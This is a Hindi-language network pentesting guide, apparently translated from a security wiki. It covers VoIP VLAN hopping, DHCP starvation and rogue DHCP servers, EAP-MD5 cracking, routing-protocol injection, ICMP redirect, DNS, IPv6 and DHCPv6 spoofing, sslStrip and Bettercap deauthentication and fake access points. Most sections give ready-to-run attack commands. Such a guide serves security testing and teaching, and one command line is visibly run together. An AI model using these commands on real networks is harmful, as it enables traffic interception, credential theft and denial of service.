VoIP फोन, जो आईओटी उपकरणों के साथ बढ़ते हुए एकीकृत हो रहे हैं, विशेष फोन नंबर के माध्यम से दरवाजे खोलने या थर्मोस्टैट को नियंत्रित करने जैसी क्षमताएँ प्रदान करते हैं। हालांकि, यह एकीकरण सुरक्षा जोखिम प्रस्तुत कर सकता है।

उपकरण voiphopper को विभिन्न वातानुकूलन (सिस्को, अवाया, नॉर्टेल, अलकाटेल-लुसेंट) में एक VoIP फोन का अनुकरण करने के लिए डिज़ाइन किया गया है। यह CDP, DHCP, LLDP-MED, और 802.1Q ARP जैसे प्रोटोकॉल का उपयोग करके आवाज नेटवर्क की VLAN ID का पता लगाता है।

VoIP Hopper सिस्को डिस्कवरी प्रोटोकॉल (CDP) के लिए तीन मोड प्रदान करता है:

1. स्निफ मोड (-c 0): वीलान आईडी की पहचान करने के लिए नेटवर्क पैकेटों का विश्लेषण करता है।

2. स्पूफ मोड (-c 1): वास्तविक VoIP उपकरण के उसके समान कस्टम पैकेट उत्पन्न करता है।

3. पूर्व-तैयार पैकेट के साथ स्पूफ मोड (-c 2): किसी विशिष्ट सिस्को आईपी फोन मॉडल के उसके समान पैकेट भेजता है।

तीसरे मोड के लिए पसंदीदा मोड तीसरा है। इसके लिए निर्दिष्ट करना आवश्यक है:

• हमलावर का नेटवर्क इंटरफेस (-i पैरामीटर)।

• अनुकृत किए जाने वाले VoIP उपकरण का नाम (-E पैरामीटर), सिस्को नामकरण प्रारूप का पालन करते हुए (जैसे, MAC पते के बाद SEP)।

कॉर्पोरेट सेटिंग्स में, किसी मौजूदा VoIP उपकरण का अनुकरण करने के लिए कोई भी कर सकता है:

• फोन पर MAC लेबल की जांच करें।

• मॉडल सूचना देखने के लिए फोन के प्रदर्शन सेटिंग्स में नेविगेट करें।

• वायरशार्क का उपयोग करके CDP अनुरोधों को देखने के लिए VoIP उपकरण को एक लैपटॉप से कनेक्ट करें।

तीसरे मोड में उपकरण को निष्पादित करने के लिए एक उदाहरण कमांड हो सकता है:

voiphopper -i eth1 -E 'SEP001EEEEEEEEE ' -c 2

DHCP हमले

गणना

nmap --script broadcast-dhcp-discover
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-16 05:30 EDT
WARNING: No targets were specified, so 0 hosts scanned.
Pre-scan script results:
| broadcast-dhcp-discover:
|   Response 1 of 1:
|     IP Offered: 192.168.1.250
|     DHCP Message Type: DHCPOFFER
|     Server Identifier: 192.168.1.1
|     IP Address Lease Time: 1m00s
|     Subnet Mask: 255.255.255.0
|     Router: 192.168.1.1
|     Domain Name Server: 192.168.1.1
|_    Domain Name: mynet
Nmap done: 0 IP addresses (0 hosts up) scanned in 5.27 seconds

DoS

DHCP सर्वर के खिलाफ दो प्रकार की DoS की जा सकती है। पहली में काफी नकली होस्ट को उपयोग करने के लिए सभी संभावित IP पतों का उपयोग करना शामिल है। यह हमला केवल तब काम करेगा अगर आप DHCP सर्वर के प्रतिक्रियाएँ देख सकते हैं और प्रोटोकॉल को पूरा कर सकते हैं (Discover (कंप) --> Offer (सर्वर) --> Request (कंप) --> ACK (सर्वर))। उदाहरण के लिए, यह वाईफ़ाई नेटवर्क में संभावित नहीं है।

DHCP DoS को करने का एक और तरीका यह है कि हर संभावित IP का स्रोत कोड के रूप में उपयोग करके एक DHCP-RELEASE पैकेट भेजें। फिर, सर्वर सोचेगा कि सभी ने IP का उपयोग समाप्त कर दिया है।

yersinia dhcp -attack 1
yersinia dhcp -attack 3 #More parameters are needed

इसे करने का एक और स्वचालित तरीका उपकरण DHCPing का उपयोग करना है।

आप मान्य सर्वरों को असक्रिय बनाने के लिए उल्लिखित DoS हमलों का उपयोग कर सकते हैं ताकि वे असक्रिय हो जाएं। इससे जब मान्य सर्वर फिर से कनेक्ट करने की कोशिश करें, आप अगले हमले में उल्लिखित दुष्कर्मी मान्यों को सर्व कर सकते हैं।

दुष्कर्मी मान्यों को सेट करें

एक दुष्कर्मी DHCP सर्वर को सेट करने के लिए /usr/share/responder/DHCP.py पर स्थित DHCP स्क्रिप्ट का उपयोग किया जा सकता है। यह नेटवर्क हमलों के लिए उपयुक्त है, जैसे HTTP ट्रैफिक और क्रेडेंशियल को कैप्चर करना, दुष्कर्मी सर्वर पर ट्रैफिक को पुनर्निर्देशित करके। हालांकि, दुष्कर्मी गेटवे सेट करना कम प्रभावी है क्योंकि यह केवल क्लाइंट से आउटबाउंड ट्रैफिक को कैप्चर करने की अनुमति देता है, वास्तविक गेटवे से प्रतिक्रियाएँ छूट जाती हैं। इसके बजाय, एक दुष्कर्मी DNS या WPAD सर्वर सेट करना एक अधिक प्रभावी हमले के लिए सिफारिश की जाती है।

नीचे दुष्कर्मी DHCP सर्वर कॉन्फ़िगर करने के लिए कमांड विकल्प हैं:

• हमारा आईपी पता (गेटवे विज्ञापन): अपनी मशीन का आईपी पता गेटवे के रूप में विज्ञापित करने के लिए -i 10.0.0.100 का उपयोग करें।

• स्थानीय DNS डोमेन नाम: वैकल्पिक रूप से, स्थानीय DNS डोमेन नाम सेट करने के लिए -d example.org का उपयोग करें।

• मूल राउटर/गेटवे आईपी: मान्य राउटर या गेटवे का आईपी पता निर्दिष्ट करने के लिए -r 10.0.0.1 का उपयोग करें।

• प्राथमिक DNS सर्वर आईपी: आपके नियंत्रण में दुष्कर्मी DNS सर्वर का आईपी पता सेट करने के लिए -p 10.0.0.100 का उपयोग करें।

• द्वितीयक DNS सर्वर आईपी: वैकल्पिक रूप से, द्वितीयक DNS सर्वर आईपी सेट करने के लिए -s 10.0.0.1 का उपयोग करें।

• स्थानीय नेटवर्क का नेटमास्क: स्थानीय नेटवर्क के लिए नेटमास्क को परिभाषित करने के लिए -n 255.255.255.0 का परिभाषित करें।

• DHCP ट्रैफिक के लिए इंटरफेस: एक विशिष्ट नेटवर्क इंटरफेस पर DHCP ट्रैफिक के लिए सुनने के लिए -I eth1 का उपयोग करें।

• WPAD कॉन्फ़िगरेशन पता: वेब ट्रैफिक अंतरदाखिल करने में सहायक होने वाले WPAD कॉन्फ़िगरेशन के लिए पता सेट करने के लिए -w “http://10.0.0.100/wpad.dat” का उपयोग करें।

• डिफ़ॉल्ट गेटवे आईपी का धोखा देना: डिफ़ॉल्ट गेटवे आईपी पता का धोखा देने के लिए -S शामिल करें।

• सभी DHCP अनुरोधों का जवाब देना: सर्वर को सभी DHCP अनुरोधों का जवाब देने के लिए -R शामिल करें, लेकिन ध्यान दें कि यह शोरगुल और पता लगाया जा सकता है।

इन विकल्पों का सही रूप से उपयोग करके, एक दुष्कर्मी DHCP सर्वर को प्रभावी ढंग से स्थापित किया जा सकता है ताकि नेटवर्क ट्रैफिक को अभिग्रहण किया जा सके।

# Example to start a rogue DHCP server with specified options
!python /usr/share/responder/DHCP.py -i 10.0.0.100 -d example.org -r 10.0.0.1 -p 10.0.0.100 -s 10.0.0.1 -n 255.255.255.0 -I eth1 -w "http://10.0.0.100/wpad.dat" -S -R

EAP हमले

यहाँ कुछ हमले के तरीके हैं जो 802.1X कार्यान्वयन के खिलाफ प्रयोग किए जा सकते हैं:

• EAP के माध्यम से सक्रिय ब्रूट-फोर्स पासवर्ड ग्राइंडिंग

• विकृत EAP सामग्री के साथ RADIUS सर्वर पर हमला **(शोषण)

• EAP संदेश को कैप्चर करना और ऑफलाइन पासवर्ड क्रैकिंग (EAP-MD5 और PEAP)

• EAP-MD5 प्रमाणीकरण को TLS प्रमाणपत्र मान्यता की अनदेखी करने के लिए बलपूर्वक करना

• हब या समान का उपयोग करके प्रमाणीकरण करते समय दुर्भाग्यपूर्ण नेटवर्क ट्रैफिक डालना

अगर हमलावर पीड़ित और प्रमाणीकरण सर्वर के बीच है, तो वह (जरूरत पड़ने पर) प्रमाणीकरण प्रोटोकॉल को EAP-MD5 में गिराने की कोशिश कर सकता है और प्रमाणीकरण प्रयास को कैप्चर कर सकता है। फिर, उसे इसका ब्रूट-फोर्सिंग करने के लिए इस्तेमाल कर सकता है:

eapmd5pass –r pcap.dump –w /usr/share/wordlist/sqlmap.txt

FHRP (GLBP & HSRP) हमले

FHRP (First Hop Redundancy Protocol) एक नेटवर्क प्रोटोकॉल कक्षा है जो एक हॉट पुनरावृत्ति मार्ग प्रणाली बनाने के लिए डिज़ाइन किए गए हैं। FHRP के साथ, भौतिक राउटर को एक ही तार्किक उपकरण में जोड़ा जा सकता है, जिससे दोष सहनशीलता बढ़ जाती है और भार का वितरण में मदद मिलती है।

सिस्को सिस्टम्स इंजीनियर्स ने दो FHRP प्रोटोकॉल, GLBP और HSRP, विकसित किए हैं।

RIP

रूटिंग इनफार्मेशन प्रोटोकॉल (RIP) के तीन संस्करण मौजूद हैं: RIP, RIPv2, और RIPng। RIP और RIPv2 द्वारा UDP का उपयोग करके पोर्ट 520 के माध्यम से पीयर्स को डेटाग्राम भेजे जाते हैं, जबकि RIPng द्वारा IPv6 मल्टीकास्ट के माध्यम से UDP पोर्ट 521 पर डेटाग्राम प्रसारित किए जाते हैं। RIPv2 ने MD5 प्रमाणीकरण का समर्थन किया। वहीं, RIPng में मूल प्रमाणीकरण शामिल नहीं है; इसके बजाय, IPv6 में IPsec AH और ESP हेडर पर निर्भरता है।

• RIP और RIPv2: UDP डेटाग्राम के माध्यम से संचार किया जाता है पोर्ट 520 पर।

• RIPng: IPv6 मल्टीकास्ट के माध्यम से UDP पोर्ट 521 का उपयोग करता है डेटाग्राम प्रसारित करने के लिए।

ध्यान दें कि RIPv2 MD5 प्रमाणीकरण का समर्थन करता है जबकि RIPng में मूल प्रमाणीकरण शामिल नहीं है, जिसका आधार IPv6 में IPsec AH और ESP हेडर पर है।

EIGRP हमले

EIGRP (Enhanced Interior Gateway Routing Protocol) एक गतिशील रूटिंग प्रोटोकॉल है। यदि कोई प्रमाणीकरण नहीं है और पैसिव इंटरफेस के कॉन्फ़िगरेशन नहीं है, तो एक अतिक्रमणकारी EIGRP रूटिंग में हस्तक्षेप कर सकता है और रूटिंग तालिकाएँ पॉइज़निंग का कारण बन सकता है। इसके अतिरिक्त, EIGRP नेटवर्क (अन्य शब्दों में, स्वतंत्र प्रणाली) समतल है और किसी भी क्षेत्र में विभाजन नहीं है। यदि कोई हमलावर एक रूट इंजेक्ट करता है, तो संभावना है कि यह रूट आत्मनिर्भर EIGRP सिस्टम में फैल जाएगा।

EIGRP सिस्टम पर हमला करने के लिए एक वैध EIGRP राउटर के साथ एक पड़ोसी को स्थापित करना आवश्यक है, जो मूल जासूसी से लेकर विभिन्न इंजेक्शन्स तक कई संभावनाएँ खोलता है।

FRRouting आपको BGP, OSPF, EIGRP, RIP और अन्य प्रोटोकॉल का समर्थन करने वाला एक वर्चुअल राउटर लागू करने की अनुमति देता है। आपको बस इसे अपने हमलावर के सिस्टम पर डिप्लॉय करना है और आप वास्तव में रूटिंग डोमेन में एक वैध राउटर बनने का दिखावा कर सकते हैं।

Coly EIGRP (Enhanced Interior Gateway Routing Protocol) ब्रॉडकास्ट को अंतर्दृष्टि करने और पैकेट इंजेक्शन करने की क्षमताओं के लिए है। यह पैकेट बदलने के लिए उपयोग किए जा सकते हैं।

OSPF

ओपन शॉर्टेस्ट पाथ फर्स्ट (OSPF) प्रोटोकॉल में MD5 प्रमाणीकरण सुनिश्चित संचार के लिए सामान्य रूप से उपयोग किया जाता है। हालांकि, इस सुरक्षा उपाय को लोकी और जॉन द रिपर जैसे उपकरणों का उपयोग करके भंग किया जा सकता है। ये उपकरण MD5 हैश को कैप्चर और क्रैक करने की क्षमता रखते हैं, प्रमाणीकरण कुंजी को उजागर करते हैं। एक बार जब यह कुंजी प्राप्त हो जाती है, तो नए रूटिंग सूचना दर्ज करने के लिए इसका उपयोग किया जा सकता है। रूट पैरामीटर कॉन्फ़िगर करने और संदर्भ कुंजी स्थापित करने के लिए, इंजेक्शन और कनेक्शन टैब का उपयोग किया जाता है।

• MD5 हैश को कैप्चर और क्रैक करना: इस उद्देश्य के लिए लोकी और जॉन द रिपर जैसे उपकरणों का उपयोग किया जाता है।

• रूट पैरामीटर कॉन्फ़िगर करना: यह इंजेक्शन टैब के माध्यम से किया जाता है।

• भंगित कुंजी सेट करना: कुंजी कनेक्शन टैब के तहत कॉन्फ़िगर की जाती है।

अन्य सामान्य उपकरण और स्रोत

• Above: नेटवर्क ट्रैफिक स्कैन करने और सुरक्षात्मकता खोजने के लिए उपकरण

• आप नेटवर्क हमलों के बारे में अधिक जानकारी यहाँ पा सकते हैं।

स्पूफिंग

हमलावर नकली DHCP प्रतिक्रियाएँ भेजकर नेटवर्क के नए सदस्य के सभी नेटवर्क पैरामीटर (जीडब्ल्यू, आईपी, डीएनएस) कॉन्फ़िगर करता है।

Ettercap
yersinia dhcp -attack 2 #More parameters are needed

ARP स्पूफिंग

पिछले खंड की जाँच करें।

ICMPRedirect

ICMP Redirect में एक ICMP पैकेट प्रकार 1 कोड 5 भेजना शामिल है जो इसका संकेत देता है कि हमलावर को एक आईपी तक पहुँचने का सबसे अच्छा तरीका है। फिर, जब पीड़ित आईपी से संपर्क करना चाहता है, तो वह पैकेट हमलावर के माध्यम से भेजेगा।

Ettercap
icmp_redirect
hping3 [VICTIM IP ADDRESS] -C 5 -K 1 -a [VICTIM DEFAULT GW IP ADDRESS] --icmp-gw [ATTACKER IP ADDRESS] --icmp-ipdst [DST IP ADDRESS] --icmp-ipsrc [VICTIM IP ADDRESS] #Send icmp to [1] form [2], route to [3] packets sent to [4] from [5]

DNS स्पूफिंग

हमलावर वह विक्टिम के लिए कुछ (या सभी) डोमेन पता लगाएगा जिनका विक्टिम से पूछता है।

set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on

dnsmasq के साथ अपना DNS कॉन्फ़िगर करें

apt-get install dnsmasqecho "addn-hosts=dnsmasq.hosts" > dnsmasq.conf #Create dnsmasq.confecho "127.0.0.1   domain.example.com" > dnsmasq.hosts #Domains in dnsmasq.hosts will be the domains resolved by the Dsudo dnsmasq -C dnsmasq.conf --no-daemon
dig @localhost domain.example.com # Test the configured DNS

स्थानीय गेटवे

अक्सर सिस्टम और नेटवर्क के लिए कई मार्ग मौजूद होते हैं। स्थानीय नेटवर्क में MAC पतों की सूची बनाने के बाद, gateway-finder.py का उपयोग करें ताकि IPv4 फॉरवर्डिंग का समर्थन करने वाले होस्ट की पहचान की जा सके।

root@kali:~# git clone https://github.com/pentestmonkey/gateway-finder.git
root@kali:~# cd gateway-finder/
root@kali:~# arp-scan -l | tee hosts.txt
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.6 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.0.0.100     00:13:72:09:ad:76       Dell Inc.
10.0.0.200     00:90:27:43:c0:57       INTEL CORPORATION
10.0.0.254     00:08:74:c0:40:ce       Dell Computer Corp.

root@kali:~/gateway-finder# ./gateway-finder.py -f hosts.txt -i 209.85.227.99
gateway-finder v1.0 http://pentestmonkey.net/tools/gateway-finder
[+] Using interface eth0 (-I to change)
[+] Found 3 MAC addresses in hosts.txt
[+] We can ping 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]
[+] We can reach TCP port 80 on 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]

LLMNR, NBT-NS, और mDNS का धोखा देना

DNS लुकअप असफल होने पर स्थानीय होस्ट निर्धारण के लिए माइक्रोसॉफ्ट सिस्टम Link-Local Multicast Name Resolution (LLMNR) और NetBIOS Name Service (NBT-NS) पर आश्रित है। उसी तरह, Apple Bonjour और Linux zero-configuration अमलन में Multicast DNS (mDNS) का उपयोग नेटवर्क में सिस्टम खोजने के लिए किया जाता है। इन प्रोटोकॉलों की प्रमाणित निर्देशिका और UDP के माध्यम से कार्य करने के कारण, संदेश प्रसारण करने के लिए, हमलावादियों द्वारा इन प्रोटोकॉलों का शोषण किया जा सकता है जो उपयोगकर्ताओं को दुरुपयोगी सेवाओं पर पुनर्निर्देशित करने का लक्ष्य रखते हैं।

आप Responder का उपयोग करके जाली प्रतिक्रियाएँ भेजकर होस्ट द्वारा खोजी जाने वाली सेवाओं का अनुकरण कर सकते हैं। और अधिक जानकारी के लिए यहाँ क्लिक करें Responder के साथ सेवाओं का अनुकरण कैसे करें।

WPAD का धोखा देना

ब्राउज़र सामान्यत: Web Proxy Auto-Discovery (WPAD) प्रोटोकॉल का उपयोग स्वचालित रूप से प्रॉक्सी सेटिंग प्राप्त करने के लिए करते हैं। इसमें विशेष रूप से "http://wpad.example.org/wpad.dat" जैसे URL के माध्यम से सर्वर से विन्यास विवरण प्राप्त करना शामिल है। ग्राहकों द्वारा इस सर्वर की खोज कई तरीकों से हो सकती है:

• DHCP के माध्यम से, जहां खोज को विशेष कोड 252 प्रविष्टि का उपयोग करके सुविधाजनक बनाया जाता है।

• DNS के माध्यम से, जिसमें स्थानीय डोमेन में लेबल wpad की खोज की जाती है।

• Microsoft LLMNR और NBT-NS के माध्यम से, जो वे स्थितियों में उपयोग किए जाते हैं जहां DNS लुकअप सफल नहीं होते हैं।

उपकरण Responder इस प्रोटोकॉल का उपयोग करके एक कुटिल WPAD सर्वर के रूप में काम करता है। यह DHCP, DNS, LLMNR, और NBT-NS का उपयोग करके ग्राहकों को इससे कनेक्ट होने के लिए गुमराह करने के लिए उपयोग करता है। और यहाँ और गहराई से जानने के लिए कि सेवाएं कैसे अनुकृत की जा सकती हैं Responder का उपयोग करके यहाँ क्लिक करें।

SSDP और UPnP उपकरणों का धोखा देना

आप नेटवर्क में विभिन्न सेवाएं प्रदान कर सकते हैं ताकि एक उपयोगकर्ता को कुछ सादा-पाठ प्रमाणपत्र दर्ज करने के लिए धोखा दे सकें। इस हमले के बारे में अधिक जानकारी के लिए SSDP और UPnP उपकरणों का धोखा देना** में।**

IPv6 Neighbor Spoofing

यह हमला ARP Spoofing के बहुत ही समान है लेकिन IPv6 विश्व में। आप पीड़ित को यहां विश्वास करा सकते हैं कि गेटवे का IPv6 आपके हमलावादक का MAC है।

sudo parasite6 -l eth0 # This option will respond to every requests spoofing the address that was requested
sudo fake_advertise6 -r -w 2 eth0 <Router_IPv6> #This option will send the Neighbor Advertisement packet every 2 seconds

IPv6 राउटर विज्ञापन स्पूफिंग/फ्लडिंग

कुछ ओएस डिफ़ॉल्ट रूप से नेटवर्क में भेजे गए आरए पैकेट्स से गेटवे को कॉन्फ़िगर करते हैं। हमलावर को आईपीवी6 राउटर के रूप में घोषित करने के लिए आप इस्तेमाल कर सकते हैं:

sysctl -w net.ipv6.conf.all.forwarding=1 4
ip route add default via <ROUTER_IPv6> dev wlan0
fake_router6 wlan0 fe80::01/16

IPv6 DHCP spoofing

डिफ़ॉल्ट रूप से कुछ ओएस DHCPv6 पैकेट को पढ़कर DNS कॉन्फ़िगर करने का प्रयास करते हैं। इसके बाद, हमलावर एक DHCPv6 पैकेट भेज सकता है ताकि वह खुद को DNS के रूप में कॉन्फ़िगर कर सके। DHCP भी पीड़ित को एक IPv6 प्रदान करता है।

dhcp6.spoof on
dhcp6.spoof.domains <list of domains>

mitm6

HTTP (फेक पेज और JS कोड इंजेक्शन)

इंटरनेट हमले

sslStrip

यह हमला बुनियादी रूप से यह करता है, जब उपयोगकर्ता को HTTP पेज तक पहुंचने की कोशिश करता है जो HTTPS संस्करण में रीडायरेक्ट हो रहा है। sslStrip एक HTTP कनेक्शन को क्लाइंट के साथ और एक HTTPS कनेक्शन को सर्वर के साथ बनाए रखेगा ताकि यह कनेक्शन को सादा पाठ में स्निफ कर सके।

apt-get install sslstrip
sslstrip -w /tmp/sslstrip.log --all - l 10000 -f -k
#iptables --flush
#iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT

अधिक जानकारी यहाँ मिलेगी।

sslStrip+ और dns2proxy HSTS को दौर करने के लिए

sslStrip+ और dns2proxy और sslStrip के बीच अंतर यह है कि वे उदाहरण के लिए www.facebook.com को wwww.facebook.com (ध्यान दें अतिरिक्त "w") में रीडायरेक्ट करेंगे और इस डोमेन का पता अटैकर आईपी के रूप में सेट करेंगे। इस तरह, ग्राहक wwww.facebook.com (आक्रमक) से कनेक्ट करेगा लेकिन पीछे के स्कीन में sslstrip+ वास्तविक कनेक्शन को https के माध्यम से www.facebook.com के साथ बनाए रखेगा।

इस तकनीक का लक्ष्य HSTS को टालना है क्योंकि wwww.facebook.com ब्राउज़र के कैश में सहेजा नहीं जाएगा, इसलिए ब्राउज़र को धोखा देकर फेसबुक प्रमाणीकरण HTTP में करने के लिए धोखा दिया जाएगा। ध्यान दें कि इस हमले को करने के लिए पीड़ित को पहले http://www.faceook.com तक पहुंचने की कोशिश करनी होगी और https नहीं। इसे एक http पृष्ठ के अंदर लिंकों को संशोधित करके किया जा सकता है।

अधिक जानकारी यहाँ, यहाँ और यहाँ मिलेगी।

sslStrip या sslStrip+ अब काम नहीं करता। इसका कारण ब्राउज़र में पहले से ही HSTS नियम सहेजे गए हैं, इसलिए यदि उपयोगकर्ता "महत्वपूर्ण" डोमेन तक पहली बार पहुंचता है तो वह इसे HTTPS के माध्यम से ही एक्सेस करेगा। इसके अलावा, ध्यान दें कि सहेजे गए नियम और अन्य उत्पन्न नियम झंडा उपयोग कर सकते हैं includeSubdomains ताकि पहले के उदाहरण में _wwww.facebook.com_ काम नहीं करेगा क्योंकि _facebook.com_ includeSubdomains के साथ HSTS का उपयोग करता है।

कार्य: easy-creds, evilgrade, metasploit, factory

पोर्ट में TCP सुनें

sudo nc -l -p 80
socat TCP4-LISTEN:80,fork,reuseaddr -

TCP + SSL पोर्ट में सुनना

कुंजी और आत्म-साइन की गई प्रमाणपत्र उत्पन्न करें

FILENAME=server
# Generate a public/private key pair:
openssl genrsa -out $FILENAME.key 1024
# Generate a self signed certificate:
openssl req -new -key $FILENAME.key -x509 -sha256 -days 3653 -out $FILENAME.crt
# Generate the PEM file by just appending the key and certificate files:
cat $FILENAME.key $FILENAME.crt >$FILENAME.pem

प्रमाणपत्र का उपयोग करके सुनें

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 -

प्रमाणपत्र का उपयोग करके सुनें और होस्ट को रीडायरेक्ट करें

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0  openssl-connect:[SERVER]:[PORT],verify=0

कभी-कभी, अगर ग्राहक जांचता है कि सीए एक वैध है, तो आप एक अन्य होस्टनाम द्वारा साइन किए गए सीए का प्रमाणपत्र प्रदान कर सकते हैं। एक और दिलचस्प परीक्षण, अनुरोधित होस्टनाम का स्व-साइन किया गया प्रमाणपत्र प्रदान करना है।

अन्य चीजें जिन्हें टेस्ट करने के लिए कोशिश की जा सकती है, प्रमाणपत्र को एक वैध प्रमाणपत्र से साइन करने का प्रयास करना जो एक वैध सीए नहीं है। या वैध सार्वजनिक कुंजी का उपयोग करने का प्रयास करें, एक ऐसे एल्गोरिथ्म का उपयोग करें जैसे डिफी हेलमैन (जिसमें वास्तविक निजी कुंजी के साथ कुछ भी डिक्रिप्ट करने की आवश्यकता नहीं है) और जब ग्राहक वास्तविक निजी कुंजी का एक प्रोब (जैसे एक हैश) अनुरोध करता है, तो एक नकली प्रोब भेजें और उम्मीद करें कि ग्राहक इसे नहीं जांचता।

Bettercap

# Events
events.stream off #Stop showing events
events.show #Show all events
events.show 5 #Show latests 5 events
events.clear

# Ticker (loop of commands)
set ticker.period 5; set ticker.commands "wifi.deauth DE:AD:BE:EF:DE:AD"; ticker on

# Caplets
caplets.show
caplets.update

# Wifi
wifi.recon on
wifi.deauth BSSID
wifi.show
# Fake wifi
set wifi.ap.ssid Banana
set wifi.ap.bssid DE:AD:BE:EF:DE:AD
set wifi.ap.channel 5
set wifi.ap.encryption false #If true, WPA2
wifi.recon on; wifi.ap

सक्रिय खोज नोट्स

ध्यान दें कि जब एक UDP पैकेट एक उपकरण को भेजा जाता है जिसमें अनुरोधित पोर्ट नहीं है, तो एक ICMP (पोर्ट अप्राप्त) भेजा जाता है।

ARP खोज

ARP पैकेट का उपयोग नेटवर्क के अंदर कौन से IPs का उपयोग हो रहा है उसे खोजने के लिए किया जाता है। PC को प्रत्येक संभावित IP पते के लिए एक अनुरोध भेजना होगा और केवल उनमें से जो उपयोग किए जा रहे हैं, वह प्रतिक्रिया देंगे।

mDNS (मल्टीकास्ट DNS)

Bettercap एक MDNS अनुरोध भेजता है (प्रत्येक X मिलीसेकंड में) _services_.dns-sd._udp.local के लिए, जिसमें इस पैकेट को देखने वाला मशीन आम तौर पर इस अनुरोध का जवाब देता है। फिर, यह केवल "सेवाओं" के लिए उत्तर देने वाले मशीनों की खोज करता है।

उपकरण

• Avahi-browser (--all)

• Bettercap (net.probe.mdns)

• Responder

NBNS (NetBios नाम सर्वर)

Bettercap नाम "CKAAAAAAAAAAAAAAAAAAAAAAAAAAA" के लिए पोर्ट 137/UDP पर प्रसारित पैकेट भेजता है।

SSDP (सिम्पल सेवा खोज प्रोटोकॉल)

Bettercap SSDP पैकेट प्रसारित करता है जो सभी प्रकार की सेवाओं की खोज कर रहा है (UDP पोर्ट 1900)।

WSD (वेब सेवा खोज)

Bettercap WSD पैकेट प्रसारित करता है जो सेवाओं की खोज कर रहा है (UDP पोर्ट 3702)।

संदर्भ

• https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9

• नेटवर्क सुरक्षा मूल्यांकन: अपने नेटवर्क को जानें (तीसरा संस्करण)

• व्यावहारिक आईओटी हैकिंग: इंटरनेट ऑफ़ थिंग्स पर हमला करने के लिए निर्देशिका। फोटियोस चंट्जिस, इओआन्निस स्टेस, पॉलिनो काल्डेरोन, एवेंजेलोस डीर्मेंट्जोग्लू, ब्यू वुड

• https://medium.com/@cursedpkt/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9

Register - IntigritiRegister - Intigriti